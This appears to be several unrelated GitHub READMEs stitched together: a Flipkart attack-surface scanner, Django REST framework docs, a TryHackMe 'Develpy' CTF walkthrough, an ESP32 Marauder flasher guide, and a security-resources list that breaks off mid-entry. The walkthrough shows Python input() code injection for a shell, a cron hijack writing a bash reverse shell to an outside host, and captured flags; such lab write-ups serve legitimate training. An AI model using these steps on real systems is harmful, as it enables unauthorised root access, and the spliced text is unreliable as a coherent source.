# Red Team Arsenal&nbsp; [![Tweet](https://img.shields.io/twitter/url/http/shields.io.svg?style=social)](https://twitter.com/intent/tweet?text=Red%20Team%20Arsenal%20(RTA)%20-%20An%20intelligent%20scanner%20to%20detect%20security%20vulnerabilities%20in%20company%27s%20layer%207%20assets&url=https://github.com/flipkart-incubator/RTA&via=a0xnirudh&hashtags=security,infosec,bugbounty) <p align="center"> <img src="https://raw.githubusercontent.com/flipkart-incubator/RTA/master/rta.svg?sanitize=true" alt="Red Team Arsenal"/> </p> [![Github Release Version](https://img.shields.io/badge/release-V2.0-green.svg)](https://github.com/flipkart-incubator/RTA) [![Github Release Version](https://img.shields.io/badge/python-3.8-green.svg)](https://github.com/flipkart-incubator/RTA) [![License](https://img.shields.io/badge/License-Apache%202.0-green.svg)](https://github.com/flipkart-incubator/RTA/blob/master/LICENSE) [![RTA loves Open source](https://badges.frapsoft.com/os/v1/open-source.svg?v=103)](https://github.com/flipkart-incubator/RTA) **Red Team Arsenal** is a inhouse framework created by flipkart security team which monitors the external attack surface of the company's online assets and provide an **holistic security** view of any security anomalies. It's a closely linked collection of various security engines and tools to conduct/simulate attacks and monitor public facing assets for anomalies and leaks. It's an intelligent framework that detects security anomalies in all layer 7 assets and reports the same. As companies continue to expand their footprint on INTERNET via various acquisitions and geographical expansions, human driven security engineering is not scalable, hence, companies need feedback driven automated systems to stay put. ## Installation ### Supported Platforms RTA has been tested both on **Ubuntu/Debian** (apt-get based distros) distros, it will also work with Mac-OS (but do replace the binaries folder with the binaries of the programs that match with your system architecture if you are running it on Mac OS) ### Prerequisites: There are a few packages which are necessary before proceeding with the installation: * Python 3.8, which is installed by default in most systems * Python pip: `sudo apt-get install python3-pip` Also, you will need to update the config file and config_mail yml files with the following data * Google Chat Webhook URL * SMTP Credentials * Github Token * Mailing List * Custom Search Engine (API Key) You can install all the requirements by running ``sudo pip3 install -r requirements.txt`` ## Usage Mention the domains you want to monitor inside 'input_files/domains.txt' ```python3 scheduler.py``` ### Configuring Google Chat: You can receive notifications in Google Chat, this can be configured by adding the webhook URL to config.yml file. ## Contributors - Anirudh Anand ([@a0xnirudh](https://twitter.com/a0xnirudh)) - Mohan KK ([@MohanKallepalli](https://twitter.com/MohanKallepalli)) - Ankur Bhargava ([@_AnkurB](https://twitter.com/_AnkurB)) - Prajal Kulkarni ([@prajalkulkarni](https://twitter.com/prajalkulkarni)) - Himanshu Kumar Das ([@mehimansu](https://twitter.com/mehimansu)) - Mandeep Jadon ([@1337tr0lls](https://twitter.com/1337tr0lls)) - Vivek Srivastav ([@vivek_15887](https://twitter.com/vivek_15887)) - Abhishek S ([@abhiabhi2306](https://twitter.com/abhiabhi2306)) ## References Thanks to the authors of the below creations. - Amass: https://github.com/owasp-amass/amass - Aquatone: https://github.com/michenriksen/aquatone - Assetfinder: https://github.com/tomnomnom/assetfinder - Chaos-Client: https://github.com/projectdiscovery/chaos-client - Chrome Driver: https://chromedriver.chromium.org/downloads - Ffuf: https://github.com/ffuf/ffuf - Finddomain: https://github.com/Findomain/Findomain - Gau: https://github.com/lc/gau - Https: https://github.com/projectdiscovery/httpx - Naabu: https://github.com/projectdiscovery/naabu - Nmap: https://nmap.org/ - Subfinder: https://github.com/projectdiscovery/subfinder - Scweet: https://pypi.org/project/Scweet/ - Cloud Enum: https://github.com/initstring/cloud_enum - DNStwist: https://github.com/elceef/dnstwist - Phonebook: https://phonebook.cz/ - SSLyze: https://github.com/nabla-c0d3/sslyze - Shodan: https://shodan.io
# [Django REST framework][docs] [![build-status-image]][travis] [![coverage-status-image]][codecov] [![pypi-version]][pypi] [![Gitter](https://badges.gitter.im/tomchristie/django-rest-framework.svg)](https://gitter.im/tomchristie/django-rest-framework?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge) **Awesome web-browsable Web APIs.** Full documentation for the project is available at [http://www.django-rest-framework.org][docs]. --- # Funding REST framework is a *collaboratively funded project*. If you use REST framework commercially we strongly encourage you to invest in its continued development by **[signing up for a paid plan][funding]**. The initial aim is to provide a single full-time position on REST framework. *Every single sign-up makes a significant impact towards making that possible.* <p align="center"> <a href="http://jobs.rover.com/"><img src="https://raw.githubusercontent.com/tomchristie/django-rest-framework/master/docs/img/premium/rover-readme.png"/></a> <a href="https://getsentry.com/welcome/"><img src="https://raw.githubusercontent.com/tomchristie/django-rest-framework/master/docs/img/premium/sentry-readme.png"/></a> <a href="https://getstream.io/try-the-api/?utm_source=drf&utm_medium=banner&utm_campaign=drf"><img src="https://raw.githubusercontent.com/tomchristie/django-rest-framework/master/docs/img/premium/stream-readme.png"/></a> <a href="http://www.machinalis.com/#services"><img src="https://raw.githubusercontent.com/tomchristie/django-rest-framework/master/docs/img/premium/machinalis-readme.png"/></a> </p> *Many thanks to all our [wonderful sponsors][sponsors], and in particular to our premium backers, [Rover](http://jobs.rover.com/), [Sentry](https://getsentry.com/welcome/), [Stream](https://getstream.io/?utm_source=drf&utm_medium=banner&utm_campaign=drf), and [Machinalis](http://www.machinalis.com/#services).* --- # Overview Django REST framework is a powerful and flexible toolkit for building Web APIs. Some reasons you might want to use REST framework: * The [Web browsable API][sandbox] is a huge usability win for your developers. * [Authentication policies][authentication] including optional packages for [OAuth1a][oauth1-section] and [OAuth2][oauth2-section]. * [Serialization][serializers] that supports both [ORM][modelserializer-section] and [non-ORM][serializer-section] data sources. * Customizable all the way down - just use [regular function-based views][functionview-section] if you don't need the [more][generic-views] [powerful][viewsets] [features][routers]. * [Extensive documentation][docs], and [great community support][group]. There is a live example API for testing purposes, [available here][sandbox]. **Below**: *Screenshot from the browsable API* ![Screenshot][image] # Requirements * Python (2.7, 3.2, 3.3, 3.4, 3.5) * Django (1.8, 1.9, 1.10) # Installation Install using `pip`... pip install djangorestframework Add `'rest_framework'` to your `INSTALLED_APPS` setting. INSTALLED_APPS = ( ... 'rest_framework', ) # Example Let's take a look at a quick example of using REST framework to build a simple model-backed API for accessing users and groups. Startup up a new project like so... pip install django pip install djangorestframework django-admin.py startproject example . ./manage.py migrate ./manage.py createsuperuser Now edit the `example/urls.py` module in your project: ```python from django.conf.urls import url, include from django.contrib.auth.models import User from rest_framework import serializers, viewsets, routers # Serializers define the API representation. class UserSerializer(serializers.HyperlinkedModelSerializer): class Meta: model = User fields = ('url', 'username', 'email', 'is_staff') # ViewSets define the view behavior. class UserViewSet(viewsets.ModelViewSet): queryset = User.objects.all() serializer_class = UserSerializer # Routers provide a way of automatically determining the URL conf. router = routers.DefaultRouter() router.register(r'users', UserViewSet) # Wire up our API using automatic URL routing. # Additionally, we include login URLs for the browsable API. urlpatterns = [ url(r'^', include(router.urls)), url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')) ] ``` We'd also like to configure a couple of settings for our API. Add the following to your `settings.py` module: ```python INSTALLED_APPS = ( ... # Make sure to include the default installed apps here. 'rest_framework', ) REST_FRAMEWORK = { # Use Django's standard `django.contrib.auth` permissions, # or allow read-only access for unauthenticated users. 'DEFAULT_PERMISSION_CLASSES': [ 'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly' ] } ``` That's it, we're done! ./manage.py runserver You can now open the API in your browser at `http://127.0.0.1:8000/`, and view your new 'users' API. If you use the `Login` control in the top right corner you'll also be able to add, create and delete users from the system. You can also interact with the API using command line tools such as [`curl`](http://curl.haxx.se/). For example, to list the users endpoint: $ curl -H 'Accept: application/json; indent=4' -u admin:password http://127.0.0.1:8000/users/ [ { "url": "http://127.0.0.1:8000/users/1/", "username": "admin", "email": "[email protected]", "is_staff": true, } ] Or to create a new user: $ curl -X POST -d username=new -d [email protected] -d is_staff=false -H 'Accept: application/json; indent=4' -u admin:password http://127.0.0.1:8000/users/ { "url": "http://127.0.0.1:8000/users/2/", "username": "new", "email": "[email protected]", "is_staff": false, } # Documentation & Support Full documentation for the project is available at [http://www.django-rest-framework.org][docs]. For questions and support, use the [REST framework discussion group][group], or `#restframework` on freenode IRC. You may also want to [follow the author on Twitter][twitter]. # Security If you believe you've found something in Django REST framework which has security implications, please **do not raise the issue in a public forum**. Send a description of the issue via email to [[email protected]][security-mail]. The project maintainers will then work with you to resolve any issues where required, prior to any public disclosure. [build-status-image]: https://secure.travis-ci.org/tomchristie/django-rest-framework.svg?branch=master [travis]: http://travis-ci.org/tomchristie/django-rest-framework?branch=master [coverage-status-image]: https://img.shields.io/codecov/c/github/tomchristie/django-rest-framework/master.svg [codecov]: http://codecov.io/github/tomchristie/django-rest-framework?branch=master [pypi-version]: https://img.shields.io/pypi/v/djangorestframework.svg [pypi]: https://pypi.python.org/pypi/djangorestframework [twitter]: https://twitter.com/_tomchristie [group]: https://groups.google.com/forum/?fromgroups#!forum/django-rest-framework [sandbox]: http://restframework.herokuapp.com/ [funding]: https://fund.django-rest-framework.org/topics/funding/ [sponsors]: https://fund.django-rest-framework.org/topics/funding/#our-sponsors [oauth1-section]: http://www.django-rest-framework.org/api-guide/authentication/#django-rest-framework-oauth [oauth2-section]: http://www.django-rest-framework.org/api-guide/authentication/#django-oauth-toolkit [serializer-section]: http://www.django-rest-framework.org/api-guide/serializers/#serializers [modelserializer-section]: http://www.django-rest-framework.org/api-guide/serializers/#modelserializer [functionview-section]: http://www.django-rest-framework.org/api-guide/views/#function-based-views [generic-views]: http://www.django-rest-framework.org/api-guide/generic-views/ [viewsets]: http://www.django-rest-framework.org/api-guide/viewsets/ [routers]: http://www.django-rest-framework.org/api-guide/routers/ [serializers]: http://www.django-rest-framework.org/api-guide/serializers/ [authentication]: http://www.django-rest-framework.org/api-guide/authentication/ [image]: http://www.django-rest-framework.org/img/quickstart.png [docs]: http://www.django-rest-framework.org/ [security-mail]: mailto:[email protected]
# Develpy boot2root machine for FIT and bsides Guatemala CTF [Develpy](https://tryhackme.com/room/bsidesgtdevelpy) ## Topic's * Network Enumeration * Code Injection (RCE) * Exploiting Crontab ## Task 1 Develpy read user.txt and root.txt ``` kali@kali:~/CTFs/tryhackme/Develpy$ sudo nmap -A -sS -sC -sV -O -p- 10.10.120.12 [sudo] password for kali: Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-15 20:54 CEST Nmap scan report for 10.10.120.12 Host is up (0.034s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 78:c4:40:84:f4:42:13:8e:79:f8:6b:e4:6d:bf:d4:46 (RSA) | 256 25:9d:f3:29:a2:62:4b:24:f2:83:36:cf:a7:75:bb:66 (ECDSA) |_ 256 e7:a0:07:b0:b9:cb:74:e9:d6:16:7d:7a:67:fe:c1:1d (ED25519) 10000/tcp open snet-sensor-mgmt? | fingerprint-strings: | GenericLines: | Private 0days | Please enther number of exploits to send??: Traceback (most recent call last): | File "./exploit.py", line 6, in <module> | num_exploits = int(input(' Please enther number of exploits to send??: ')) | File "<string>", line 0 | SyntaxError: unexpected EOF while parsing | GetRequest: | Private 0days | Please enther number of exploits to send??: Traceback (most recent call last): | File "./exploit.py", line 6, in <module> | num_exploits = int(input(' Please enther number of exploits to send??: ')) | File "<string>", line 1, in <module> | NameError: name 'GET' is not defined | HTTPOptions, RTSPRequest: | Private 0days | Please enther number of exploits to send??: Traceback (most recent call last): | File "./exploit.py", line 6, in <module> | num_exploits = int(input(' Please enther number of exploits to send??: ')) | File "<string>", line 1, in <module> | NameError: name 'OPTIONS' is not defined | NULL: | Private 0days |_ Please enther number of exploits to send??: 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port10000-TCP:V=7.80%I=7%D=10/15%Time=5F889B14%P=x86_64-pc-linux-gnu%r( SF:NULL,48,"\r\n\x20\x20\x20\x20\x20\x20\x20\x20Private\x200days\r\n\r\n\x SF:20Please\x20enther\x20number\x20of\x20exploits\x20to\x20send\?\?:\x20") SF:%r(GetRequest,136,"\r\n\x20\x20\x20\x20\x20\x20\x20\x20Private\x200days SF:\r\n\r\n\x20Please\x20enther\x20number\x20of\x20exploits\x20to\x20send\ SF:?\?:\x20Traceback\x20\(most\x20recent\x20call\x20last\):\r\n\x20\x20Fil SF:e\x20\"\./exploit\.py\",\x20line\x206,\x20in\x20<module>\r\n\x20\x20\x2 SF:0\x20num_exploits\x20=\x20int\(input\('\x20Please\x20enther\x20number\x SF:20of\x20exploits\x20to\x20send\?\?:\x20'\)\)\r\n\x20\x20File\x20\"<stri SF:ng>\",\x20line\x201,\x20in\x20<module>\r\nNameError:\x20name\x20'GET'\x SF:20is\x20not\x20defined\r\n")%r(HTTPOptions,13A,"\r\n\x20\x20\x20\x20\x2 SF:0\x20\x20\x20Private\x200days\r\n\r\n\x20Please\x20enther\x20number\x20 SF:of\x20exploits\x20to\x20send\?\?:\x20Traceback\x20\(most\x20recent\x20c SF:all\x20last\):\r\n\x20\x20File\x20\"\./exploit\.py\",\x20line\x206,\x20 SF:in\x20<module>\r\n\x20\x20\x20\x20num_exploits\x20=\x20int\(input\('\x2 SF:0Please\x20enther\x20number\x20of\x20exploits\x20to\x20send\?\?:\x20'\) SF:\)\r\n\x20\x20File\x20\"<string>\",\x20line\x201,\x20in\x20<module>\r\n SF:NameError:\x20name\x20'OPTIONS'\x20is\x20not\x20defined\r\n")%r(RTSPReq SF:uest,13A,"\r\n\x20\x20\x20\x20\x20\x20\x20\x20Private\x200days\r\n\r\n\ SF:x20Please\x20enther\x20number\x20of\x20exploits\x20to\x20send\?\?:\x20T SF:raceback\x20\(most\x20recent\x20call\x20last\):\r\n\x20\x20File\x20\"\. SF:/exploit\.py\",\x20line\x206,\x20in\x20<module>\r\n\x20\x20\x20\x20num_ SF:exploits\x20=\x20int\(input\('\x20Please\x20enther\x20number\x20of\x20e SF:xploits\x20to\x20send\?\?:\x20'\)\)\r\n\x20\x20File\x20\"<string>\",\x2 SF:0line\x201,\x20in\x20<module>\r\nNameError:\x20name\x20'OPTIONS'\x20is\ SF:x20not\x20defined\r\n")%r(GenericLines,13B,"\r\n\x20\x20\x20\x20\x20\x2 SF:0\x20\x20Private\x200days\r\n\r\n\x20Please\x20enther\x20number\x20of\x SF:20exploits\x20to\x20send\?\?:\x20Traceback\x20\(most\x20recent\x20call\ SF:x20last\):\r\n\x20\x20File\x20\"\./exploit\.py\",\x20line\x206,\x20in\x SF:20<module>\r\n\x20\x20\x20\x20num_exploits\x20=\x20int\(input\('\x20Ple SF:ase\x20enther\x20number\x20of\x20exploits\x20to\x20send\?\?:\x20'\)\)\r SF:\n\x20\x20File\x20\"<string>\",\x20line\x200\r\n\x20\x20\x20\x20\r\n\x2 SF:0\x20\x20\x20\^\r\nSyntaxError:\x20unexpected\x20EOF\x20while\x20parsin SF:g\r\n"); No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.80%E=4%D=10/15%OT=22%CT=1%CU=38173%PV=Y%DS=2%DC=T%G=Y%TM=5F889B OS:97%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10D%TI=Z%CI=I%II=I%TS=8)OP OS:S(O1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST OS:11NW7%O6=M508ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)EC OS:N(R=Y%DF=Y%T=40%W=6903%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F= OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5( OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z% OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C OS:D=S) Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 8080/tcp) HOP RTT ADDRESS 1 34.19 ms 10.8.0.1 2 34.65 ms 10.10.120.12 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 173.85 seconds ``` [view-source:http://10.10.120.12:10000/](view-source:http://10.10.120.12:10000/) ``` Private 0days Please enther number of exploits to send??: Traceback (most recent call last): File "./exploit.py", line 6, in <module> num_exploits = int(input(' Please enther number of exploits to send??: ')) File "<string>", line 1, in <module> NameError: name 'GET' is not defined ``` ``` ali@kali:~/CTFs/tryhackme/Develpy$ nc 10.10.120.12 10000 Private 0days Please enther number of exploits to send??: 2 Exploit started, attacking target (tryhackme.com)... Exploiting tryhackme internal network: beacons_seq=1 ttl=1337 time=0.041 ms Exploiting tryhackme internal network: beacons_seq=2 ttl=1337 time=0.055 ms kali@kali:~/CTFs/tryhackme/Develpy$ nc 10.10.120.12 10000 Private 0days Please enther number of exploits to send??: "a" Traceback (most recent call last): File "./exploit.py", line 6, in <module> num_exploits = int(input(' Please enther number of exploits to send??: ')) ValueError: invalid literal for int() with base 10: 'a' kali@kali:~/CTFs/tryhackme/Develpy$ nc 10.10.120.12 10000 Private 0days Please enther number of exploits to send??: 11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111 Exploit started, attacking target (tryhackme.com)... Traceback (most recent call last): File "./exploit.py", line 9, in <module> for i in range(num_exploits): OverflowError: range() result has too many items kali@kali:~/CTFs/tryhackme/Develpy$ nc 10.10.120.12 10000 Private 0days Please enther number of exploits to send??: eval(1) Traceback (most recent call last): File "./exploit.py", line 6, in <module> num_exploits = int(input(' Please enther number of exploits to send??: ')) File "<string>", line 1, in <module> TypeError: eval() arg 1 must be a string or code object kali@kali:~/CTFs/tryhackme/Develpy$ nc 10.10.120.12 10000 Private 0days Please enther number of exploits to send??: eval("1") Exploit started, attacking target (tryhackme.com)... Exploiting tryhackme internal network: beacons_seq=1 ttl=1337 time=0.020 ms kali@kali:~/CTFs/tryhackme/Develpy$ nc 10.10.120.12 10000 Private 0days Please enther number of exploits to send??: eval ("1+1") Exploit started, attacking target (tryhackme.com)... Exploiting tryhackme internal network: beacons_seq=1 ttl=1337 time=0.032 ms Exploiting tryhackme internal network: beacons_seq=2 ttl=1337 time=0.094 ms kali@kali:~/CTFs/tryhackme/Develpy$ nc 10.10.120.12 10000 Private 0days Please enther number of exploits to send??: __import__('os').system('bash') bash: cannot set terminal process group (759): Inappropriate ioctl for device bash: no job control in this shell king@ubuntu:~$ whoami king king@ubuntu:~$ pwd /home/king king@ubuntu:~$ ls credentials.png exploit.py root.sh run.sh user.txt king@ubuntu:~$ cat user.txt cf85ff769cfaaa721758949bf870b019 king@ubuntu:~$ ``` ``` king@ubuntu:~$ sudo -l sudo: no tty present and no askpass program specified king@ubuntu:~$ id uid=1000(king) gid=1000(king) groups=1000(king),4(adm),24(cdrom),30(dip),46(plugdev),114(lpadmin),115(sambashare) king@ubuntu:~$ cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) * * * * * king cd /home/king/ && bash run.sh * * * * * root cd /home/king/ && bash root.sh * * * * * root cd /root/company && bash run.sh # king@ubuntu:~$ ls credentials.png exploit.py root.sh run.sh user.txt king@ubuntu:~$ rm -rf root.sh king@ubuntu:~$ ls credentials.png exploit.py run.sh user.txt king@ubuntu:~$ echo "bash -i >& /dev/tcp/10.8.106.222/4444 0>&1" > root.sh ``` ``` kali@kali:~/CTFs/tryhackme/Develpy$ nc -lvnp 4444 listening on [any] 4444 ... connect to [10.8.106.222] from (UNKNOWN) [10.10.120.12] 47824 bash: cannot set terminal process group (1227): Inappropriate ioctl for device bash: no job control in this shell root@ubuntu:/home/king# cd /root cd /root root@ubuntu:~# ls ls company root.txt root@ubuntu:~# cat root.txt cat root.txt 9c37646777a53910a347f387dce025ec ``` 1. user.txt `cf85ff769cfaaa721758949bf870b019` 2. root.txt `9c37646777a53910a347f387dce025ec`
# Quick and easy flasher/updater for [Marauder](https://github.com/justcallmekoko/ESP32Marauder) ESP32-WROOM! ## This flasher/updater will work for any ESP32-WROOM chip or the v4 OEM Marauder. Looking for a Linux/OS X version? [Check out SkeletonMan's Python edition!](https://github.com/SkeletonMan03/FZEasyMarauderFlash) ![Flasher_1](https://user-images.githubusercontent.com/57457139/210445500-c0ef079e-6d5e-4157-b61f-2c4f8bc83820.png) ## Now it's as easy as 1, 2, 3 to install or update Marauder on Windows. 1. Download and extract [the ZIP file](https://github.com/UberGuidoZ/Flipper/raw/main/Wifi_DevBoard/FZ_Marauder_Flasher/ESP32-WROOM/Marauder_WROOM_v1.10.zip) above to the same directory.<br> 2. Plug in your ESP32-WROOM or v4 OEM Marauder directly into your PC via USB.<br> 3. Double-click `Flash-WROOM.bat` from the extracted files then choose `Flash` or `Update`. **NOTE: You may have to hold the boot button while plugging it in or even for the entire duration of the flash!** * If you choose `Flash Marauder` the script will locate your board and flash Marauder automatically!<br> * If you choose `Update Marauder` you'll be taken to the Marauder download location to grab a new version.<br> (Simply download the OLD_HARDWARE BIN file, stick it in the WROOM subfolder by the batch file, and delete the old BIN.)<br> * If you choose `Download USB UART` the script will open the Silicon Labs driver download. Current Marauder version included in the ZIP: v0.10.0.20221222 (current release as of Dec 22, 2022) **Once the install has completed, [head over here](https://github.com/justcallmekoko/ESP32Marauder/wiki) to learn more about what Marauder can do!** The [batch file](https://github.com/UberGuidoZ/Flipper/blob/main/Wifi_DevBoard/FZ_Marauder_Flasher/ESP32-WROOM/Flash-WROOM.bat) is also included above for review and to track changes. Acknowledgements:<br> * [justcallmekoko](https://github.com/justcallmekoko/ESP32Marauder) for the AWESOME work in developing Marauder and porting it to the Flipper. * [Frog](https://github.com/FroggMaster) For initial scripting under the [Wifi Pentest Tool](https://github.com/FroggMaster/ESP32-Wi-Fi-Penetration-Tool) and inspiring the idea.<br> * [SkeletonMan](https://github.com/SkeletonMan03/FZEasyMarauderFlash) For initial WROOM scripting and inspiration.<br> * [UberGuidoZ](https://github.com/UberGuidoZ) Creation of this one, plus tweaking/automating Frog's original, continued scripting, development, and testing. ----- ## Donation Information Nothing is ever expected for the hoarding of digital files, creations I have made, or the people I may have helped. ## Ordering from Lab401? [USE THIS LINK FOR 5% OFF!](https://lab401.com/r?id=vsmgoc) (Or code `UberGuidoZ` at checkout.) I've had so many asking for me to add this.<br> ![Flipper_Blush](https://user-images.githubusercontent.com/57457139/183561666-4424a3cc-679b-4016-a368-24f7e7ad0a88.jpg) ![Flipper_Love](https://user-images.githubusercontent.com/57457139/183561692-381d37bd-264f-4c88-8877-e58d60d9be6e.jpg) **BTC**: `3AWgaL3FxquakP15ZVDxr8q8xVTc5Q75dS`<br> **BCH**: `17nWCvf2YPMZ3F3H1seX8T149Z9E3BMKXk`<br> **ETH**: `0x0f0003fCB0bD9355Ad7B124c30b9F3D860D5E191`<br> **LTC**: `M8Ujk52U27bkm1ksiWUyteL8b3rRQVMke2`<br> **PayPal**: `[email protected]` So, here it is. All donations of *any* size are humbly appreciated.<br> ![Flipper_Clap](https://user-images.githubusercontent.com/57457139/183561789-2e853ede-8ef7-41e8-a67c-716225177e5d.jpg) ![Flipper_OMG](https://user-images.githubusercontent.com/57457139/183561787-e21bdc1e-b316-4e67-b327-5129503d0313.jpg) Donations will be used for hardware (and maybe caffeine) to further testing!<br> ![UberGuidoZ](https://cdn.discordapp.com/emojis/1000632669622767686.gif)
# Getting Started in Cybersecurity and Hacking ## Introduction This guide aims to provide easy-to-access resources for individuals interested in learning more about Technology, Cybersecurity, Ethical hacking, and Bug Bounty. Below, you will find organized links and resources related to each topic for your convenience. ## Table of Contents - [Getting Started](https://github.com/Striving-to-learn/Cybersecurity-Resources/blob/main/README.md#getting-started) - [Hacking and Security Challenges](https://github.com/Striving-to-learn/Cybersecurity-Resources/blob/main/README.md#hacking-and-security-challenges) - [Hacking Techniques](https://github.com/Striving-to-learn/Cybersecurity-Resources/blob/main/README.md#hacking-techniques) - [Programming](https://github.com/Striving-to-learn/Cybersecurity-Resources/blob/main/README.md#programming) - [Linux](https://github.com/Striving-to-learn/Cybersecurity-Resources/blob/main/README.md#linux) - [Networking](https://github.com/Striving-to-learn/Cybersecurity-Resources/blob/main/README.md#networking) - [Certifications](https://github.com/Striving-to-learn/Cybersecurity-Resources/blob/main/README.md#certifications) - [Web Application Security](https://github.com/Striving-to-learn/Cybersecurity-Resources/blob/main/README.md#web-application-security) - [Cybersecurity Tools](https://github.com/Striving-to-learn/Cybersecurity-Resources/blob/main/README.md#cybersecurity-tools) - [Cloud Security](https://github.com/Striving-to-learn/Cybersecurity-Resources/blob/main/README.md#cloud-security) - [Digital Forensics](https://github.com/Striving-to-learn/Cybersecurity-Resources/blob/main/README.md#digital-forensics) - [Operating Systems](https://github.com/Striving-to-learn/Cybersecurity-Resources/blob/main/README.md#operating-systems) - [Osint](https://github.com/Striving-to-learn/Cybersecurity-Resources/blob/main/README.md#osint) - [References and Cheat sheets](https://github.com/Striving-to-learn/Cybersecurity-Resources/blob/main/README.md#references-and-cheatsheets) - [Communities and Conferences](https://github.com/Striving-to-learn/Cybersecurity-Resources/blob/main/README.md#communities-and-conferences) - [Blogs, Wikis, Magazines, and Forums](https://github.com/Striving-to-learn/Cybersecurity-Resources/blob/main/README.md#blogs-wikis-magazines-and-forums) - [Security Research](https://github.com/Striving-to-learn/Cybersecurity-Resources/blob/main/README.md#security-research) - [Glossary and terms](https://github.com/Striving-to-learn/Cybersecurity-Resources/blob/main/README.md#glossary) Various terms are used in this article. A glossary of cybersecurity terms is provided below - [Contributions](https://github.com/Striving-to-learn/Cybersecurity-Resources/blob/main/README.md#contributions) ## Getting Started ### Books and PDFs #### Legal PDFs about Programming, Networking, IT, Cybersecurity, and Penetration Testing - [Hacker High School](https://www.hackerhighschool.org/lessons.html#info1-1o) - [Free Security eBooks on GitHub](https://github.com/Hack-with-Github/Free-Security-eBooks) - [Free Programming eBooks on GitHub](https://github.com/EbookFoundation/free-programming-books/blob/main/casts/free-podcasts-screencasts-en.md) Please note that pirating will not be supported, as many books are available for free in a legal way. ### Educational Channels #### Hacking/Cybersecurity Youtubers: - [Hak5](https://www.youtube.com/channel/UC3s0BtrBJpwNDaflRSoiieQ) Hacking hardware, cybersecurity news, hacking tech, and general hacking tutorials. - [Webpwnized](https://www.youtube.com/channel/UCPeJcqbi8v46Adk59plaaXg) Hacking tutorials, CTFS, Linux. - [Sstec](https://www.youtube.com/c/SSTecTutorials/playlists) Hacking tutorials, CTFS, and projects. - [Hackhappy](https://www.youtube.com/channel/UCVakgfsqxUDo2uTmv9MV_cA) Hacking tutorials, CTFS, and Linux. - [Derek Rook](https://www.youtube.com/c/DerekRook/videos) CTFS (Capture the Flags). - [John Hammond](https://www.youtube.com/channel/UCVeW9qkBjo3zosnqUbG7CFw) Programming, hacking tutorials, malware analysis, CTFS, Linux, and careers. - [Nullbyte](https://www.youtube.com/channel/UCgTNupxATBfWmfehv21ym-g) Hacking tutorials, cybersecurity for ethical hackers and programmers. - [Hackersploit](https://www.youtube.com/channel/UC0ZTPkdxlAKf-V33tqXwi3Q) Penetration testing, web application hacking tutorials, Linux, malware analysis. - [InsiderPHD](https://www.youtube.com/channel/UCPiN9NPjIer8Do9gUFxKv7A) How to get started with bug bounty hunting. - [STOK](https://www.stokfredrik.com/) Bug bounty tutorials, vulnerability analysis, hacking tools, and hacking methodology. - [Liveoverflow](https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w) Hacking tutorials, CTFs/writeups, HackTheBox, web programming. - [IppSec](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA) Labs and capture-the-flag tutorials, HackTheBox, etc. - [Peter Yaworski](https://www.youtube.com/user/yaworsk1?app=desktop) Web-application hacking tips and interviews. - [Bugcrowd](https://www.youtube.com/c/Bugcrowd) Bug bounty methodology and interviews. - [The Cyber Mentor](https://www.youtube.com/channel/UC0ArlFuFYMpEewyRBzdLHiw) Ethical hacking, web application hacking, hardware tutorials, tech reviewer. - [Nahamsec](https://www.youtube.com/c/Nahamsec/featured) Educational hacking and bug bounty videos and career advice. - [Simply Cyber](https://www.simplycyber.io/) Helps people with cybersecurity career development, and has a daily cybersecurity news video. - [Black Hat](https://www.youtube.com/c/BlackHatOfficialYT) Technical cybersecurity conferences. - [DEFCON](https://www.youtube.com/user/DEFCONConference) Technical Cybersecurity Conference. - [13Cubed](https://www.youtube.com/channel/UCy8ntxFEudOCRZYT1f7ya9Q) Videos on tools, forensics, and incident response. - [BlackPerl](https://www.youtube.com/channel/UCqVIVdF5lwb3uMhiS0XM4XQ) Malware analysis, forensics, and incident response. - [Computerphile](https://www.youtube.com/user/Computerphile/videos) Programming, programming concepts, tech concepts, networking, programming and hacking, Linux. - [Security Weekly](https://www.youtube.com/channel/UCg--XBjJ50a9tUhTKXVPiqg) Interviews with 